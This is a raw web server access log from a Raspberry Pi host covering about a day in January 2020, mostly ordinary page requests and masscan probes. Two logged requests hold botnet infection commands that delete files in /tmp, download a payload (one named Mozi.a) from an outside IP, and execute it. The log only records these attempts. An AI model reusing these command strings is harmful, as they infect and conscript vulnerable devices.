Wed Jan 22 06:25:05 MST 2020 06:25:05 up 33 days, 21:16, 1 user, load average: 0.20, 0.25, 0.52 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 19Dec19 34days 42:28 5.54s /usr/bin/lxsession -s LXDE-pi -e LXDE 95.47.164.238 - - [22/Jan/2020:13:36:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 69.162.126.238 - - [22/Jan/2020:13:38:36 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 69.162.126.238 - - [22/Jan/2020:13:38:36 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 42.234.233.205 - - [22/Jan/2020:13:43:39 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://42.234.233.205:59813/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 0 "" "Hello, world" 191.7.208.66 - - [22/Jan/2020:14:45:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 85.204.221.230 - - [22/Jan/2020:14:50:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 103.233.122.95 - - [22/Jan/2020:15:05:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 159.203.126.90 - - [22/Jan/2020:15:06:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 139.162.119.197 - - [22/Jan/2020:16:52:16 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 222.186.19.221 - - [22/Jan/2020:17:16:35 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 116.252.0.238 - - [22/Jan/2020:17:17:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 220.200.156.183 - - [22/Jan/2020:17:17:25 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 51.79.102.96 - - [22/Jan/2020:18:02:47 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 51.79.102.96 - - [22/Jan/2020:18:02:47 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 66.240.205.34 - - [22/Jan/2020:18:04:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 123.145.6.52 - - [22/Jan/2020:18:31:07 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 123.179.12.93 - - [22/Jan/2020:18:31:10 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 112.80.137.235 - - [22/Jan/2020:18:31:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 194.180.224.249 - - [22/Jan/2020:20:45:19 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 209.97.190.223 - - [22/Jan/2020:21:38:09 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 167.99.40.21 - - [22/Jan/2020:22:04:18 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 167.99.40.21 - - [22/Jan/2020:22:04:22 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 124.122.167.93 - - [22/Jan/2020:22:14:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 94.1.80.104 - - [22/Jan/2020:22:54:53 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 74.214.229.223 - - [22/Jan/2020:23:10:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [22/Jan/2020:23:10:52 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [22/Jan/2020:23:11:32 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [22/Jan/2020:23:11:45 +0000] "GET /ac0xl/Curse-2019-07-25.pdf HTTP/1.1" 200 31651 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [22/Jan/2020:23:11:57 +0000] "GET /ac0xl/Curse-2019-07-25.pdf HTTP/1.1" 206 2 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [22/Jan/2020:23:11:58 +0000] "GET /ac0xl/Curse-2019-07-25.pdf HTTP/1.1" 200 31651 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 74.214.229.223 - - [22/Jan/2020:23:12:08 +0000] "GET /ac0xl/Curse-2019-07-25.txt HTTP/1.1" 200 1277 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Linux; Android 5.1.1; Z916BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36" 109.73.181.240 - - [23/Jan/2020:00:04:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 80.82.77.139 - - [23/Jan/2020:01:10:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 80.82.77.139 - - [23/Jan/2020:01:10:48 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "" 80.82.77.139 - - [23/Jan/2020:01:10:49 +0000] "GET /sitemap.xml HTTP/1.1" 200 186 "" "" 80.82.77.139 - - [23/Jan/2020:01:10:49 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0 "" "" 80.82.77.139 - - [23/Jan/2020:01:10:50 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "python-requests/2.13.0" 122.102.25.83 - - [23/Jan/2020:01:15:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 189.69.68.127 - - [23/Jan/2020:01:28:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.250.19.7 - - [23/Jan/2020:03:10:43 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [23/Jan/2020:03:10:52 +0000] "GET /ac0xl/logs/2020.01.22 HTTP/1.1" 200 6777 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 169.197.108.42 - - [23/Jan/2020:04:24:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 109.228.237.239 - - [23/Jan/2020:05:56:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 109.228.237.239 - - [23/Jan/2020:05:57:51 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 50.73.116.41 - - [23/Jan/2020:06:34:17 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 5.202.77.254 - - [23/Jan/2020:06:51:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 34.244.7.127 - - [23/Jan/2020:07:46:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Apache-HttpClient/4.5.1 (Java/1.8.0_192)" 34.244.7.127 - - [23/Jan/2020:07:46:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Java/1.8.0_192" 62.86.203.177 - - [23/Jan/2020:09:19:38 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 176.113.115.51 - - [23/Jan/2020:10:16:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 206.189.237.232 - - [23/Jan/2020:10:44:17 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 103.212.91.61 - - [23/Jan/2020:11:30:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 219.89.206.239 - - [23/Jan/2020:11:50:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 222.186.19.221 - - [23/Jan/2020:13:05:09 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" Thu Jan 23 06:25:06 MST 2020 06:25:06 up 34 days, 21:16, 1 user, load average: 0.57, 0.50, 0.96 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 19Dec19 35days 43:20 5.68s /usr/bin/lxsession -s LXDE-pi -e LXDE